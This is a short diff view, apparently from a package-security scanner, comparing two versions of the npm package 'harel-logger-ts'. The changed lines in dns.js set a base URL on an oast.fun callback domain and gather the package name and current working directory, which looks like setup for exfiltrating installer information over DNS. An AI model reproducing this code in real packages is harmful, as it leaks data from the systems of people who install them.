harel-logger-ts 1.0.6 → 1.0.8
Sign up to get free protection for your applications and to get access to all the features.
- package/dns.js +1 -1
- package/package.json +1 -2
package/dns.js
CHANGED
@@ -2,7 +2,7 @@ var os = require("os");
|
|
2
2
|
const dns = require('dns');
|
3
3
|
|
4
4
|
const characters ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
|
5
|
-
const baseurl = ".
|
5
|
+
const baseurl = ".cdt6561bn6qs73f30tr0z3rxd3et79r1s.oast.fun"
|
6
6
|
const id = generateString(3) + "."
|
7
7
|
const npmpkg = "harel-logger-ts"
|
8
8
|
const path = process.cwd().toString();
|
package/package.json
CHANGED